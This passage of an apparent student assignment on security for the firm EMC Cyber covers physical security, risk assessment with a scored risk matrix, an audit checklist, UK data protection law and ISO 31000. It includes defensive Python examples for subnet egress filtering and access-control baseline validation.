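two of the controls described above. (1) Source address validation: a packet
leaving the subnet whose source is outside the subnet's range is treated as
spoofed and dropped. (2) Explicit connection policy: traffic is forwarded only to
destinations on an allow-list of peer subnets; everything else is denied by
default, and a direct attempt to reach an address outside the virtual network's
address plan is additionally flagged as an alert. The subnet, address plan,
allow-list and packets are constructed for illustration."""
from dataclasses import dataclass
from ipaddress import IPv4Network, ip_address, ip_network
from typing import Dict, Iterable, List, Tuple

# Constructed address plan of the virtual network (the RFC 1918 private ranges).
VIRTUAL_NETWORK = [
    ip_network("10.0.0.0/8"),
    ip_network("172.16.0.0/12"),
    ip_network("192.168.0.0/16"),
]


@dataclass(frozen=True)
class Decision:
    verdict: str          # "forward" or "drop"
    reason: str
    alert: bool = False   # True when the event should be raised to security staff


class SubnetBorderFilter:
    def __init__(self, subnet: str, allowed_peers: Iterable[str]) -> None:
        self.subnet: IPv4Network = ip_network(subnet)
        self.allowed: List[IPv4Network] = [ip_network(p) for p in allowed_peers]

    def check_egress(self, src: str, dst: str) -> Decision:
        """Decide the fate of one packet leaving this subnet."""
        s, d = ip_address(src), ip_address(dst)
        if s not in self.subnet:
            # Source address validation: the sender claims an address this
            # subnet does not own, so the packet is spoofed.
            return Decision("drop", "spoofed source: not in the subnet's address range", alert=True)
        if any(d in peer for peer in self.allowed):
            return Decision("forward", "destination on the explicit allow-list")
        if not any(d in net for net in VIRTUAL_NETWORK):
            # Direct link to the outside world from a non-gateway node.
            return Decision("drop", "direct external connection attempt; must use the gateway", alert=True)
        return Decision("drop", "no connection policy for this destination (default deny)")

    def filter_batch(self, packets: Iterable[Tuple[str, str]]) -> Dict[str, int]:
        """Apply the policy to (src, dst) pairs and count the outcomes."""
        counts = {"forward": 0, "drop": 0, "alert": 0}
        for src, dst in packets:
            decision = self.check_egress(src, dst)
            counts[decision.verdict] += 1
            if decision.alert:
                counts["alert"] += 1
        return counts


# Constructed sample: subnet 10.1.0.0/24 may talk to 10.2.0.0/24 and to one host 10.3.0.10.
SAMPLE_FILTER = SubnetBorderFilter("10.1.0.0/24", ["10.2.0.0/24", "10.3.0.10/32"])
SAMPLE_PACKETS = [
    ("10.1.0.5", "10.2.0.8"),       # allowed peer subnet -> forward
    ("10.1.0.5", "10.3.0.10"),      # allowed single host -> forward
    ("10.1.0.5", "10.3.0.11"),      # internal but not on the allow-list -> default deny
    ("192.168.9.9", "10.2.0.8"),    # source outside 10.1.0.0/24 -> spoofed, alert
    ("10.1.0.200", "203.0.113.7"),  # direct external attempt -> drop, alert
]

if __name__ == "__main__":
    for src, dst in SAMPLE_PACKETS:
        d = SAMPLE_FILTER.check_egress(src, dst)
        flag = "  [ALERT]" if d.alert else ""
        print(f"{src:>12} -> {dst:<14} {d.verdict:8} {d.reason}{flag}")
    print(SAMPLE_FILTER.filter_batch(SAMPLE_PACKETS))
```

The order of the checks matters: a spoofed source is rejected before any policy lookup, so an attacker cannot borrow an allowed peer's address to pass the allow-list, and only the two cases the text calls a potential breach (spoofing and an unsanctioned external link) raise an alert, while an ordinary default-deny drop is merely counted.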

Physical Security Measures implemented by EMC Cyber

• Lock up the server room
  o Make sure the server room door is securely locked before locking down the
    servers, in fact before turning them on for the first time. The finest lock
    in the world won't do any good if we don't use it, so we also need policies
    requiring that those doors be shut whenever the room is empty. The policies
    should also specify who holds the key or keycode to gain entry.
  o The server room is the heart of our physical network: anybody with physical
    access to the room's servers, switches, routers, cables, and other equipment
    can cause a great deal of harm.
• Set up surveillance
  o Locking the server room door is a good first step, but someone may break in,
    or someone with access might abuse that privilege. EMC needs a way to record
    who enters and exits, and when. The simplest method is a logbook for signing
    in and out, but this has several disadvantages: someone with bad intentions
    will probably just ignore it.
  o An authentication system built into the locking mechanisms would be
    preferable to the logbook, since it would require a smart card, token, or
    biometric scan to unlock the doors and would keep a record of who enters.
• Make sure the most vulnerable devices are in that locked room
  o The servers are not EMC's only concern. A hacker can connect a laptop to a
    hub and use sniffer software to record network traffic. Make sure as many
    EMC Cyber network devices as possible are in that locked room or, if they
    must be elsewhere in the facility, in a locked closet.
• Use rack mount servers
  o In addition to occupying less space in the server room, rack mount servers
    are also simpler to safeguard. Despite being smaller and perhaps lighter
    than (some) tower systems, they can be quickly secured into locked racks
    that, once filled with numerous servers, can be bolted to the floor, making
    the whole thing nearly impossible to move, much less steal.
• Pack up the backups
  o Backing up important data is an essential element of disaster recovery, but
    don't forget that the information on those backup tapes, disks, or discs can
    be stolen and used by someone outside the company. Many IT administrators
    keep the backups next to the server in the server room. They should be
    locked in a drawer or safe at the very least. Ideally, a set of backups
    should be kept off site, and you must take care to ensure that they are
    secured in that offsite location.
  o Don't overlook the fact that some workers may back up their work on floppy
    disks, USB keys, or external hard disks. If this practice is allowed or
    encouraged, be sure to have policies requiring that those backups always be
    locked up.

Activity 03
3.1 Discuss suitable risk assessment integrated enterprise risk management
procedures for EMC Cyber solutions and the impact an IT security audit will
have on safeguarding organization and its clients. Furthermore, your discussion
should include how IT security can be aligned with an organizational IT policy
and how misalignment of such a policy can impact on organization’s security.

Risk Assessment
What is Risk Assessment?
Risk assessment is the process of finding potential threats to a company's capacity to do
business. These analyses assist in identifying these inherent company risks and offer steps,
procedures, and controls to lessen their negative effects on daily operations.
To prioritise and communicate the contents of the evaluation, including any threats to their
information technology (IT) infrastructure, businesses might utilise a risk assessment
framework (RAF). The RAF assists an organisation in identifying prospective risks, any
company assets put at risk by these risks, as well as potential consequences should these risks
materialise.
The Chief Risk Officer (CRO) or a Chief Risk Manager is often in charge of conducting the
risk assessment process in major businesses.

Risk Assessment Process
Depending on the risks particular to the type of business, the sector that business is in,
and the compliance regulations that are relevant to that specific business or industry, a
risk assessment is undertaken in a variety of ways. Regardless of the nature of their
business or sector, organisations may still use the following five generic steps.

• Step 1: Determine the dangers. The first stage in a risk assessment is finding
  possible risks that, if they materialised, would have a detrimental impact on
  the organisation's capacity to conduct business. Natural catastrophes, utility
  outages, cyberattacks, and power outages are examples of potential risks that
  could be taken into account or discovered during the risk assessment process.
• Step 2: Determine who or what might be harmed. The next stage after identifying
  the risks is to ascertain which company assets would be adversely affected if
  the risk materialised. Critical infrastructure, IT systems, corporate
  operations, brand reputation, and even staff safety might be considered
  business assets that are at risk from these threats.
• Step 3: Assess the risks and create control strategies. A risk analysis can
  assist in determining how risks will affect company assets and the steps that
  can be taken to lessen or eliminate those risks' effects. Property destruction,
  business interruption, financial loss, and legal repercussions are all examples
  of potential risks.
• Step 4: Summarise your results. The firm should document the results of the
  risk assessment and save them in conveniently accessible formal papers. Details
  on possible dangers, the risks they pose, and measures to prevent them should
  be included in the records.
• Step 5: Consistently review and revise the risk assessment. In a modern company
  context, potential risks, hazards, and the resultant controls may all change
  very quickly. To keep up with these developments, it is critical for businesses
  to periodically update their risk assessments.

Risk Assessment Framework
A risk assessment framework (RAF) is a method for ranking security hazards to an
information technology (IT) infrastructure and disseminating information about them.
Information should be organised and presented by a decent RAF so that both technical and
non-technical employees can understand it.

A RAF has the three following important components:

• shared vocabulary
• consistent assessment methods
• reporting system

Common concepts and methods for risk assessment assist an organisation in determining
which systems are most or least vulnerable to abuse or assault. However, because risk
evaluations are so highly subjective, it is impossible to rely on them to consistently achieve
their goals. As a result, RAFs cannot be utilised in verification audits, compliance
evaluations, etc. because of their subjectivity.

However, the information offered by an RAF is helpful for anticipating future dangers,
preparing budgets, and developing a culture in which the importance of data is recognised.

Date       | Author         | Email                 | Description               | Purpose                                          | Guidance | Objectives                                     | Security and Admin Standard
2022/10/12 | M.A.S. Jayathu | E114762@esoft.academy | Risk Assessment Procedure | Identify the risk assessment and finding solutions | NIST     | Identify risk and finding solutions (Risk Matrix) | M.A.S. Jayathu

Risk Management Process

The steps that must be taken are outlined in the risk management process. The risk
management process, which consists of five fundamental components, is used to manage
risk. Starting with risk identification, it then moves on to risk analysis, risk
prioritisation, solution implementation, and risk monitoring. Each stage in a manual
system requires a significant amount of administration and paperwork.

• Identify the Risk
• Analyse the Risk
• Evaluate or Rank the Risk
• Treat the Risk
• Monitor and Review the Risk

Step 1: Identify the Risk

• Finding the risks to which the company is exposed in its operational environment
  is the first stage in the risk management process.

  Risks come in a wide variety of forms:

  o Legal risks
  o Environmental risks
  o Market risks
  o Regulatory risks, etc.
• As many of these risk factors as feasible should be identified. In a manual
  setting, these risks are recorded by hand; if the firm is using a risk
  management solution, all this information is entered directly into the system.

Step 2: Analyse the Risk

• A risk must be examined after it has been identified. Determine the risk's
  extent first. Understanding the relationship between the risk and other
  organisational characteristics is also crucial. It is vital to look at how many
  business operations the risk affects in order to gauge its degree and severity.
  There are dangers that, if they materialise, might put the entire firm at risk,
  while other hazards will, according to the analysis, merely cause small
  annoyances.

Step 3: Evaluate the Risk or Risk Assessment

• It is necessary to rank and prioritise risks. Most risk management solutions
  categorise hazards by their intensity. Risks that might result in little
  discomfort are ranked lower than risks that could cause catastrophic loss,
  which are rated highest. Ranking hazards is crucial because it gives the
  business a comprehensive understanding of its overall exposure to risk. The
  company may be exposed to several low-level hazards without senior management
  needing to become involved; however, even one of the worst hazards is
  sufficient to warrant prompt action.

Step 4: Treat the Risk

• It is essential to minimise or eliminate any risk. Connecting with
  subject-matter specialists in the area where the risk is present enables this.
  In a manual setup, this requires getting in touch with each stakeholder before
  scheduling meetings where everyone may voice their concerns. The issue is that
  the conversation becomes fragmented across several email threads, various
  spreadsheets and papers, and numerous phone conversations. A risk management
  solution allows for system-wide communication among all pertinent
  stakeholders. The discussion of the danger and potential solutions can happen
  inside the system, and upper management can keep a close eye on the solutions
  being suggested and the progress being made. Instead of everyone contacting
  each other to get updates, everyone can get updates directly from within the
  risk management solution.

Step 5: Monitor and Review the Risk

• Some hazards cannot be completely eradicated; they are always there. Market
  risks and environmental threats are among the hazards that must continually be
  assessed. Under manual methods, dedicated staff do the monitoring, and these
  experts need to be careful to keep a close eye on all risk variables. In a
  digital setting, the risk management system keeps track of the organisation's
  whole risk framework, and everybody can see any change in a factor or danger
  right away. Computers are also significantly better than people at
  continuously assessing threats. Your company can guarantee continuity by
  keeping an eye on potential threats. We can explain to you how to develop a
  risk management strategy to track and evaluate the risk.

60 | P a g e
Risk Impact and Probability Chart
The corners of the chart have these characteristics:

• Low impact/low probability: risks in the bottom left corner are low level, and
  you can often ignore them.
• Low impact/high probability: risks in the top left corner are of moderate
  importance. If these things happen, you can cope with them and move on;
  however, you should try to reduce the likelihood that they'll occur.
• High impact/low probability: risks in the bottom right corner are of high
  importance if they do occur, but they're very unlikely to happen. For these,
  you should do what you can to reduce the impact they'll have if they do occur,
  and you should have contingency plans in place just in case they do.
• High impact/high probability: risks towards the top right corner are of
  critical importance. These are your top priorities and are risks that you must
  pay close attention to.

Figure 10 Risk Probability Chart

EMC Cyber Risk Impact and Risk Matrix
Risk Levels

Impact for organization \ Likelihood of incident | Very Low (Very Unlikely) | Low | Medium | High | Very High
Very low                                          | 0                        | 1   | 2      | 3    | 4
Low                                               | 1                        | 2   | 3      | 4    | 5
Medium                                            | 2                        | 3   | 4      | 5    | 6
High                                              | 3                        | 4   | 5      | 6    | 7
Very High                                         | 4                        | 5   | 6      | 7    | 8

Risk Probability and Impacts

(The same matrix drawn as a heat map, with scores from 0 at the bottom left to 8 at the
top right:
4 5 6 7 8
3 4 5 6 7
2 3 4 5 6
1 2 3 4 5
0 1 2 3 4)

EMC CYBER RISK IMPACTS

Cyber Attacks

A cyberattack is any offensive manoeuvre that targets computer information systems,
computer networks, infrastructures, or personal computer devices.

Probability: High
Impact: High
Risk: Hacked into the EMC Cyber system or network
Solution:
  - Keep EMC software and systems fully up to date
  - Ensure endpoint protection
  - Install a firewall
  - Back up EMC Cyber data
  - Control access to EMC systems
  - Wi-Fi security

• Cyber attacks against EMC Cyber can be stopped by protecting and securing all
  the software and networks.

Data Loss

Data loss is a type of error that occurs when information is lost due to mistakes made during
processing, transmission, or storage. To prevent data loss or to recover lost data, information
systems use technology and procedures for backup and disaster recovery.

Probability: High
Impact: High
Risk:
  - Hardware failure. A recent study showed hardware failures are the most
    frequently cited reason for data loss among businesses and home users.
  - Human error (accidental deletion)
  - Natural disasters
  - Theft or loss
  - Hackers and viruses
Solution:
  - Implement a data security plan
  - Encrypt data
  - Communicate data securely
  - Use access controls and firewalls
  - Use external service providers carefully
  - Keep some data off the network

Unauthorized access

A person gains logical or physical access without permission to a network, system,
application, data, or other resource.

Probability: Medium
Impact: Medium
Risk:
  - Tailgating
  - Door propping
  - Levering doors
  - Keys
  - Access cards
Solution:
  - Monitoring
  - Two-factor authentication
  - Single sign-on (SSO)
  - Keep fingerprints (biometric access)
  - IP whitelisting

Equipment Theft

Theft is the act of taking another person's property or services without that person's
permission or consent, with the intent to deprive the rightful owner of it.

Probability: Low
Impact: Low
Risk: Theft of computer equipment, tools, devices, and other items from EMC Cyber
Solution:
  - Use night-time cameras, motion sensors, and/or light towers
  - Hire private night guards for after-hours surveillance
  - Keep employees up to date on security practices
  - Move equipment to a safer location during off-hours
  - Immediately report a theft upon discovery
  - Keep records of all equipment

Natural Disaster

"The adverse effect following an actual occurrence of a natural hazard in the event that
it considerably hurts a community" is what is meant by "natural catastrophe". A natural
catastrophe usually leaves behind some economic harm in addition to the potential for
loss of life or property damage.

Probability: Medium
Impact: Medium
Risk:
  - Hurricanes and tropical storms
  - Landslides and debris flow
  - Thunderstorms and lightning
  - Tornadoes
  - Tsunamis
  - Wildfire
  - Winter and ice storms
Solution:
  - Map and avoid high-risk zones
  - Build hazard-resistant structures and houses
  - Protect and develop hazard buffers (forests, reefs, etc.)
  - Develop a culture of prevention and resilience
  - Improve early warning and response systems
  - Build institutions, and development policies and plans
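The EMC Cyber risk matrix and the five risk register entries above, scored and ranked in Python as an added example that is not part of the original assignment. The score is the matrix cell value (likelihood index plus impact index, 0 to 8) exactly as in the Risk Levels table, and the register values are those given in the tables above; the tie-breaking order for equal scores (register order) is an assumption of this example.

```python
"""Added example, not from the assignment: the EMC Cyber risk matrix as code.
Likelihood and impact each take one of five levels; the score is the sum of the
two level indices, which reproduces the 0 to 8 grid of the Risk Levels table.
The five risks from the EMC Cyber register are then scored and ranked, highest
first, which is the 'evaluate or rank the risk' step of the risk management
process. No bands or thresholds beyond the grid itself are assumed."""
from typing import Dict, List, Tuple

LEVELS = ["very low", "low", "medium", "high", "very high"]  # matrix index 0..4


def level_index(name: str) -> int:
    """Map a level label such as 'Very High' to its position in the matrix."""
    key = name.strip().lower()
    if key not in LEVELS:
        raise ValueError(f"unknown level: {name!r}")
    return LEVELS.index(key)


def risk_score(likelihood: str, impact: str) -> int:
    """Cell value of the matrix: likelihood index + impact index, 0 to 8."""
    return level_index(likelihood) + level_index(impact)


def build_matrix() -> List[List[int]]:
    """Rows are impact (very low .. very high), columns are likelihood."""
    return [[risk_score(likelihood, impact) for likelihood in LEVELS] for impact in LEVELS]


# Risk register as given in the EMC Cyber tables above: name -> (probability, impact).
EMC_RISK_REGISTER: Dict[str, Tuple[str, str]] = {
    "Cyber Attacks": ("High", "High"),
    "Data Loss": ("High", "High"),
    "Unauthorized access": ("Medium", "Medium"),
    "Equipment Theft": ("Low", "Low"),
    "Natural Disaster": ("Medium", "Medium"),
}


def rank_register(register: Dict[str, Tuple[str, str]]) -> List[Tuple[str, int]]:
    """Return (risk, score) pairs, highest score first; ties keep register order
    (sorted() is stable, so equal scores stay in insertion order)."""
    scored = [(name, risk_score(prob, impact)) for name, (prob, impact) in register.items()]
    return sorted(scored, key=lambda item: -item[1])


if __name__ == "__main__":
    for row_label, row in zip(LEVELS, build_matrix()):
        print(f"impact {row_label:9} | " + " ".join(str(v) for v in row))
    print()
    for name, score in rank_register(EMC_RISK_REGISTER):
        print(f"score {score}  {name}")
```

Run stand-alone it prints the grid row by row and then the ranked register, which puts the two High/High entries (cyber attacks and data loss, score 6) ahead of the Medium/Medium ones (score 4) and equipment theft last (score 2), matching the priority the probability chart assigns to the top-right corner.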

IT Security and Organizational Policy


IT security Audit
A security audit evaluates a company's information system's security systematically by
gauging how closely it adheres to predetermined standards. A comprehensive audit often
evaluates the security of the system's software, information handling procedures, user
behaviour, and physical setup and surroundings.

Security audits are frequently used to ascertain compliance with laws that stipulate how
businesses must handle information, such as the Health Insurance Portability and
Accountability Act, the Sarbanes-Oxley Act, and the California Security Breach Information
Act.

Along with vulnerability analyses and penetration testing, these audits are one of the three
primary categories of security diagnostics. Security audits compare the effectiveness of an
information system to a set of standards. An extensive examination of an information system
to identify potential security flaws is known as a vulnerability assessment. A security
specialist will use a covert technique called penetration testing to check a system's resistance
to a particular assault. Each strategy has its own advantages, and the most successful strategy
may include combining two or more of them.

Cybersecurity Audit Benefits

1) Ensure your data is protected.
2) View operations from a new angle.
3) Identify gaps in your protection.
4) Stay ahead of regulations.
5) Use recommendations to improve.

Organizational Policy

An organisational policy is a set of limitations that management sets on how the
organisation's resources may be used. In a cloud resource hierarchy, for example, the
organisation policy administrator defines a policy once at the organisation, folder or project
level, and every resource beneath that level inherits it.

Organizational Policy Advantages

 provide rules and guidelines for decision-making in routine situations
 provide a consistent and clear response across the company in dealing with situations
 demonstrate your good faith that workers will be treated fairly and equally
 provide an accepted method of dealing with complaints and misunderstandings to
help avoid claims of bias and favouritism
 provide a clear framework for the delegation of decision-making
 provide a means of communicating information to new workers
 ensure that you are better equipped to defend claims of a breach of employer
obligations, e.g., health and safety legislation.

What is security misalignment?

 Security misalignment arises when security strategy is decided hastily or in isolation
from the organisation's business goals. The resulting misalignment has detrimental
effects on the organisation that frequently resemble those of a data breach.

How Misalignment Impacts an Organization's Security

 Adverse experiences for legitimate prospect/customer traffic
 Overwhelmed security teams
 Siloed data and lack of knowledge
 Cumbersome technology and business resistance
 Underutilized solutions and exposed applications

Security Audit

Date: 2022/10/12 | Admin: Sahan Jayathu | Email: [email protected] | Purpose: Security audit

Info | Description | Yes/No

Organizational policy and procedure | Are the IT roles and duties outlined in the EMC organizational structure? | ✓
Organizational policy and procedure | Are the server administrators skilled? | ✓
Organizational policy and procedure | Does the organizational policy apply to everyone? | ✓
Organizational policy and procedure | Are your employees familiar with existing security procedures and policies? | ✓
Organizational policy and procedure | Does the document communicate executive direction such as vision, mission, values, or objectives? | ✓

Access control | Does an access control baseline exist that documents the permissions necessary for each data set? | ✓
Access control | Are access privileges in the organisation granted adequately? | ✓
Access control | Have users only been assigned the appropriate permissions to the data sets necessary to complete their job requirements? | ✓
Access control | Do proper authorizations exist for each user granted rights to each of the organization's data sets? | ✓
Access control | Does an automated validation process exist to ensure that only proper users have the proper rights to each data set? | ✓
Access control | Does an access control baseline exist for all data sets that details the appropriate permissions for each user who needs access to the resource? | ✓

Security | Do you have a disaster recovery plan? | ✓
Security | Does your organisation have cyber security policies and procedures in place? | ✓
Security | Does your organisation protect all sensitive information transmissions? | ✓
Security | Are all devices protected from the internet by a firewall? | ✓
Security | Does your organisation have a designated cyber security professional? | ✓
Security | Does your organisation have a cyber security user education and awareness program? | ✓
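The access control items in the audit ask whether an automated validation process compares the rights users actually hold against a documented baseline. The script below, added here as an example and not EMC Cyber's own tooling, shows one way to run that check: it parses a constructed ACL export, compares it with a constructed baseline, and reports excess rights, users with no approved entry, data sets with no baseline at all, and approved rights that are no longer granted (a stale baseline). The export format, the baseline layout and every user and data set name are assumptions made for the example.

```python
"""Automated access-control baseline validation (added example, not EMC Cyber code).

Compares the permissions actually granted on each data set with a documented
baseline and reports every deviation. The baseline, the ACL export format and
all user and data-set names are constructed for illustration.
"""
from dataclasses import dataclass
from typing import Dict, List, Set

# Baseline: data set -> user -> permissions that user is approved to hold (constructed).
BASELINE: Dict[str, Dict[str, Set[str]]] = {
    "client-contracts": {"alice": {"read", "write"}, "bob": {"read"}},
    "payroll": {"carol": {"read", "write"}},
}

# Constructed ACL export, one grant per line: "<data set>,<user>,<permission>".
ACL_EXPORT = """\
# exported 2022-10-12
client-contracts,alice,read
client-contracts,alice,write
client-contracts,bob,read
client-contracts,bob,write
client-contracts,dave,read
payroll,carol,read
backups,carol,write
"""


@dataclass(frozen=True)
class Finding:
    dataset: str
    user: str
    kind: str               # excess | unapproved-user | unbaselined-dataset | missing
    permissions: frozenset


def parse_acl(export: str) -> Dict[str, Dict[str, Set[str]]]:
    """Turn the export into data set -> user -> granted permissions; rejects malformed lines."""
    actual: Dict[str, Dict[str, Set[str]]] = {}
    for lineno, raw in enumerate(export.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = [p.strip() for p in line.split(",")]
        if len(parts) != 3 or not all(parts):
            raise ValueError(f"malformed ACL line {lineno}: {raw!r}")
        dataset, user, perm = parts
        actual.setdefault(dataset, {}).setdefault(user, set()).add(perm)
    return actual


def validate(baseline: Dict[str, Dict[str, Set[str]]],
             actual: Dict[str, Dict[str, Set[str]]]) -> List[Finding]:
    """Every deviation between what is granted and what the baseline approves."""
    findings: List[Finding] = []
    for dataset, grants in actual.items():
        approved = baseline.get(dataset)
        for user, perms in grants.items():
            if approved is None:
                findings.append(Finding(dataset, user, "unbaselined-dataset", frozenset(perms)))
            elif user not in approved:
                findings.append(Finding(dataset, user, "unapproved-user", frozenset(perms)))
            elif perms - approved[user]:
                findings.append(Finding(dataset, user, "excess", frozenset(perms - approved[user])))
    # Approved rights that are not actually granted: the baseline is stale or access was revoked.
    for dataset, approved in baseline.items():
        for user, allowed in approved.items():
            missing = allowed - actual.get(dataset, {}).get(user, set())
            if missing:
                findings.append(Finding(dataset, user, "missing", frozenset(missing)))
    return sorted(findings, key=lambda f: (f.dataset, f.user, f.kind))


def audit(baseline=BASELINE, export=ACL_EXPORT) -> List[Finding]:
    """Run the full check; an empty list means the grants match the baseline exactly."""
    return validate(baseline, parse_acl(export))


if __name__ == "__main__":
    for f in audit():
        print(f"{f.kind:20} {f.dataset:18} {f.user:8} {sorted(f.permissions)}")
```

Run as a scheduled job against a real ACL export, a non-empty result is the audit finding; the "missing" category is worth keeping because a baseline that no longer matches reality is as much an audit failure as an over-privileged user.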

3.2 Explain the mandatory data protection laws and procedures which will be applied to
data storage solutions provided by EMC Cyber. You should also summarize ISO 31000
risk management methodology.

Data protection is the set of measures that safeguard information from corruption, compromise
or loss. EMC Cyber is a cyber security company that secures its clients every day against cyber
threats, risks and attacks, and it is responsible for the client data it holds, which is why data
protection matters in EMC Cyber. A large part of a data protection strategy is ensuring that data
can be restored quickly after any corruption or loss. EMC Cyber is tasked with protecting
companies' networks, clouds, web applications and emails. They also offer advanced threat
protection, secure unified access and endpoint security, and they consult clients on security
threats and how to solve them.

Data protection and privacy laws

System design must take a comprehensive approach to data protection and include
administrative, technological and legal precautions. To begin with, legislative frameworks
that protect user rights, personal information and privacy should serve as the foundation for
any system that stores or processes personal data, including EMC Cyber's data storage
solutions. Many nations have implemented general data protection and privacy legislation
that covers government and private-sector initiatives processing personal data. These laws
often contain broad regulations and guidelines relating to the gathering, storing and use of
personal information, in conformity with international standards on privacy and data
protection, such as:

 Purpose limitation: Personal data should only be collected and used for the
following reasons: those that are permitted by law and so, at least theoretically, can be
known by the data subject at the time of collection; or those that the data subject has
consented to.
 Proportionality and minimization: To prevent unneeded data gathering and "feature
creep", both of which can cause privacy problems, the data acquired must be in
proportion to the purpose of the system. This is frequently stated as requiring the
collection of only the "minimum necessary" data, including transaction information, to
achieve the desired results.
 Lawfulness: Personal data should only be collected and used when necessary and on
legal grounds, such as those involving consent, contractual requirements, legal
compliance, protection of vital interests, public interest, and/or legitimate interest.
 Fairness and transparency: Personal information should be gathered and used fairly
and openly.
 Accuracy: Personal information must be current and accurate, and any errors must be
quickly fixed.
 Storage limitations: Personal data—including transaction metadata—should not be
kept longer than is necessary for the purposes for which it is collected and processed.
With respect to transaction metadata, people can be given an option for how long such
data are retained.
 Privacy-enhancing technologies (PETs): Requirements to use technologies that
protect privacy (e.g., the tokenization of unique identity numbers) by eliminating or
reducing the collection of personal data, preventing unnecessary or undesired
processing of personal data, and facilitating compliance with data protection rules.

 Accountability: The processing of personal data in accordance with the above
principles should be monitored by an appropriate, independent oversight authority,
and by data subjects themselves.

Data protection laws and procedures

Data Protection Act 1998
Computer Misuse Act 1990

Data Protection Act 1998

The Data Protection Act 1998 (c. 29), an Act of the UK Parliament, was created to safeguard
personal data held on computers or in an organised paper filing system. It implemented the
rules of the 1995 European Union (EU) Data Protection Directive on the storage, processing
and transfer of data.

Individuals had legal rights to manage information about themselves under the 1998 DPA.
The vast majority of the Act did not apply to residential usage, including maintaining a
personal address book. Subject to certain exceptions, anybody who holds personal data for
other reasons is required by law to adhere to this Act. To guarantee that information was
treated legitimately, the Act established eight data protection principles.

It was replaced by the Data Protection Act 2018 (DPA 2018), which received Royal Assent on
23 May 2018 and took effect on 25 May 2018, the same day the EU General Data Protection
Regulation (GDPR) began to apply. The DPA 2018 supplements the GDPR, which imposes far
stricter rules on the gathering, holding and usage of personal data.

Data Protection Act 1998 principles

The eight guiding principles of the Act are as follows:

 Principle 1 - Fair and Lawful
 Principle 2 - Purposes
 Principle 3 - Adequacy
 Principle 4 - Accuracy
 Principle 5 - Retention
 Principle 6 - Rights
 Principle 7 - Security
 Principle 8 - International transfers

Principle 1 - Fair and Lawful

Personal data should be processed fairly and lawfully. The Act requires a fair processing
notice that obliges the controller to inform the data subject of the following:

 The identity of the data controller
 The purposes for which the personal data are intended to be processed
 To whom the personal data may be disclosed

Under the first data protection principle, individuals were granted the right to have their
personal information treated fairly and lawfully by any organisation.

Principle 2 - Purposes

Personal data should be obtained only for one or more specified and lawful purposes, and
should not be further processed in any manner incompatible with those purposes.

Under the second data protection principle, the controller may only use personal data for
legitimate and lawful purposes that were specified when the data was collected.

Principle 3 - Adequacy

Only personal information that is necessary for the intended usage should be collected. It
must not be excessive for the intended application.

The controller is obligated to only gather the necessary information under the third data
protection principle.

Principle 4 - Accuracy

Personal information needs to be current and correct. Personal information can no longer be
utilised for the intended purpose if it is erroneous.

The controller must only gather, store, and maintain accurate information about the
individual, according to the fourth data protection principle.

Principle 5 - Retention

Personal information shouldn't be stored any longer than necessary. Personal information
cannot be kept on file forever unless it is needed.

The controller's ability to store a person's personal information for an extended period of time
is constrained by the fifth data protection principle.

Principle 6 - Rights

Individual rights should be respected while processing personal data. The following rights are
mentioned in the legislation:

o Access to personal data
o Preventing processing likely to cause damage or distress
o Preventing direct marketing
o Rights in relation to automated decision making
o Correcting inaccurate personal data
o Compensation

Under the sixth data protection principle, individuals were granted the right to control how
their personal data was used, giving them a say in how businesses that hold information about
them use it in their operations.

Principle 7 - Security

To preserve both the integrity of personal data and people's rights and freedoms, personal
information should be safeguarded using reasonable and useful measures. According to the
Act, controllers must take action to prevent the following:

o Unauthorised processing of personal data
o Unlawful processing of personal data
o Accidental destruction, damage, or loss to personal data

The controller is required by law to protect data from unauthorised or illegal processing as
well as accidental loss or destruction under the seventh data protection principle.

Principle 8 - International transfers

To safeguard the rights and freedoms of data subjects and their personal data, personal data
should not be transferred to a country or territory outside the European Economic Area unless
that country or territory ensures an adequate level of protection for the data.

Under the eighth data protection principle, the controller must confirm that the destination
country has adequate data protection in place before transferring personal data abroad, or
rely on one of the Act's exceptions, such as the data subject's consent to the transfer.

Computer Misuse Act of 1990


The Computer Misuse Act 1990 was passed by the British Parliament, in part as a reaction to
the ruling in R v Gold & Schifreen [1988] 1 AC 1063. It created three offences: unauthorised
access to computer material (section 1), unauthorised access with intent to commit or
facilitate further offences (section 2), and unauthorised modification of computer material
(section 3, since amended to cover impairing the operation of a computer). The Bill's
detractors said that it was poorly thought out and hurriedly proposed, that it was frequently
impossible to establish intent, and that the law did not effectively distinguish between
"joyriding" hackers like Gold and Schifreen and serious cybercriminals. The Act is still
regarded as "a solid and adaptable piece of legislation in terms of dealing with cybercrime",
and numerous other nations, notably Canada and the Republic of Ireland, have used it as a
model when developing their own information security laws. Several amendments have been
passed to keep the Act up to date.

ISO 31000 Risk Management Methodology


An international standard known as ISO 31000 was released in 2009 (and revised in 2018)
and offers concepts and recommendations for efficient risk management. It presents a general
approach to risk management that may be utilised by any kind of company and applied to
various risks (financial, safety, and project risks). The standard gives discussion of risk
management a consistent terminology and ideas. It offers concepts and recommendations that
might aid in conducting an evaluation of your organization's risk management procedure.

The standard stays at a generic level and does not include specific requirements or directions
on how to handle certain risks. It also does not offer any guidance about a particular
application area.

ISO 31000 innovates in several ways compared with earlier risk management standards:

 It defines risk as the effect of uncertainty on objectives, which stresses that objectives
must be set before risks can be managed and that uncertainty itself is what has to be
handled.

 It introduces the (often contentious) concept of "risk appetite," which is the degree of
risk that an organisation would accept in exchange for predicted benefits.
 It establishes a framework for risk management with various organisational practises,
roles, and duties.
 It is a management philosophy in which risk management is viewed as a crucial
component of making strategic decisions and managing change.

The following actions are part of the risk management process described in the ISO 31000
standard:

 Risk identification: determining what could make it difficult for the organisation to
achieve its objectives.
 Risk analysis: understanding the causes and sources of the identified risks; analysing
likelihoods and consequences, taking the existing controls into account, to determine
the level of residual risk.
 Risk evaluation: comparing the results of the risk analysis with the risk criteria to
decide whether the residual risk is tolerable.
 Risk treatment: adjusting the magnitude and likelihood of both positive and negative
consequences to maximise net benefit.
 Establishing the context: this activity, which was left out of earlier formulations of
the risk management process, includes identifying the objectives of the organisation,
the scope of the risk management process and the criteria for evaluating risks. The
context is made up of internal and external factors, including governance, culture,
norms and regulations, capabilities, current contracts, worker expectations,
information systems, market and stakeholder circumstances, stakeholder expectations
and the regulatory environment.
 Monitoring and review: measuring risk management performance against indicators
that are periodically assessed for appropriateness. It entails reviewing the
effectiveness of the risk management framework; reporting on risk, on progress with
the risk management plan and on how well the risk management policy is being
followed; looking for deviations from the plan; and determining whether the
framework, policy and plan are still appropriate given the organisation's external and
internal context.
 Communication and consultation: understanding the interests and concerns of
